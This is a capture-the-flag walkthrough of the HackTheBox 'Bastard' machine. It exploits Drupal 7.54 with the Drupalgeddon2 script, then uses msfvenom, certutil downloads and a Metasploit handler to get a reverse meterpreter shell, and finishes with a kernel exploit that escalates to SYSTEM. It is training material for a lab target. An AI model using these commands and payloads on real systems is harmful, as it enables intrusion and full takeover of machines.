Bastard HackTheBox WalkThrough
This is Bastard HackTheBox machine walkthrough and it is also 6th machine of our OSCP like HTB boxes
series
. In this writeup, I have demonstrated step-by-step how I rooted to Bastard HTB
machine.
Before starting let us know something about this machine. It is a Windows
machine with IP address 10.10.10.9
and difficulty medium
assigned by its maker. This machine is currently retired
so you will require VIP
subscription at hackthebox.eu
to access this machine. Before starting, connect your PC with VPN and make sure your connectivity with Bastard machine by pinging the IP 10.10.10.9. If all goes correct then start hacking. As usual I started by scanning the machine. I used Nmap
[a popular port scanner] for this task and the result is below-
Scanning
$ nmap -sC -sV -oN bastard.nmap 10.10.10.9
Nmap revealed that port 80, 135 and 49154 are open. Microsoft IIS 7
web server on port 80
, Microsoft RPC
service on port 135
& 49154
are running. Nmap script http-generator
revealed that the website is made up of Drupal CMS
[Drupal is a Content Management System as we have WordPress] and its version is 7
. Soon I get any software and its version then immediately I search for public exploit using searchsploit
. Searchsploit listed many number of potential exploits. However, the problem is that, there are many numbers of exploits and we do not know which exploit will surely work. For filtering the most appropriate one, I had to know the exact version of the Drupal
, which is running on port 80. After some googling, found this answer from stackoverflow.
Ongoing to http://10.10.10.9/CHANGELOG.txt URL found that the installed version is 7.54
.
Then again queried through searchsploit
and this time it found 8 potential exploits
.
$ searchsploit drupal 7.54
After trying each of them, I found only 44449.rb
worked for me. For more info about this exploit, you can check here. Then, mirrored
the exploit to my current directory using -m
switch of searchsploit.
$ searchsploit -m php/webapps/44449.rb
Currently file 44449.rb
is in DOS
form so converted it into UNIX
format using the command dos2unix
.
$ dos2unix 44449.rb
Ran this exploit to get user shell.
Getting User Shell
$ ruby 44449.rb
http://10.10.10.9
drupalgeddon2 >> whoami
Note: If you get error as shown in the screenshot. This error is due to a missing a gem named highline, in your gem directory. Therefore, to solve this problem you have to install this gem using the command $sudo gem install highline
We got a user shell
by the user named iusr
. Right now, we are in a fake cmd shell, which has limited functionality, and we cannot capture user flag because this shell restricts the execution of type
command. So, I upgraded the shell to meterpreter shell by dropping a payload created through msfvenom,
into bastard machine and then getting meterpreter
shell
back on my listener in msfconsole
.
Upgrading Shell
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4321 -f exe>shell.exe
# This will create an exe payload on our local PC$ python3 -m http.server 80
//Start python http server to host this shell.exe filedrupalgeddon2>>certutil.exe -urlcache -split -f "http://10.10.14.8/shell.exe" shell.exe
# This will download the payload to bastard machine.
Started the listener on msfconsole to get the reverse shell backmsf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.8
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > exploit
meterpreter > sysinfo
We have successfully upgraded our shell to meterpreter shell. Now we have many options to play with our meterpreter shell.
Capture User Flag
meterpreter > cat 'C:\Users\dimitris\Desktop\user.txt'
Privilege Escalation
To escalate the privilege to admin we have to first find a privilege escalation vector
. Then using that PrivEsc vector we will exploit, to get admin privilege shell. To find PrivEsc vector I ran the post exploitation module post/multi/recon/local_exploit_suggester
, which gathers all the exploit modules that can be used to escalate privilege. Basically, it will enumerate all the potential Kernel Exploits
whose patch is not installed in the Bastard Machine.
Finding PrivEsc Vector
meterpreter > run post/multi/recon/local_exploit_suggester
Local Exploit Suggester gave 5 exploits that can be used to get admin shell. I tried each of them one by one and only exploit/windows/local/ms16_014_wmi_recv_notif
module worked. So here, our
PrivEsc vector
is a
Kernel Exploit.
Getting Root Shell
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> set SESSION 1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> set LHOST 10.10.14.8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif)> exploit
meterpreter > getuid
We are NT AUTHORITY\SYSTEM
. Let us capture root flag.
Capture Root Flag
meterpreter > cat /Users/Administrator/Desktop/root.txt.txt
This was how I rooted Bastard HackTheBox machine. Learnt a lot after hunting this box. Hope you people have also learnt some new things from this box. Thanks for reading this writeup. Write your experience in the comment section. For any suggestion and query related to walkthrough feel free to write us at [email protected].
Next machine walkthrough is Arctic.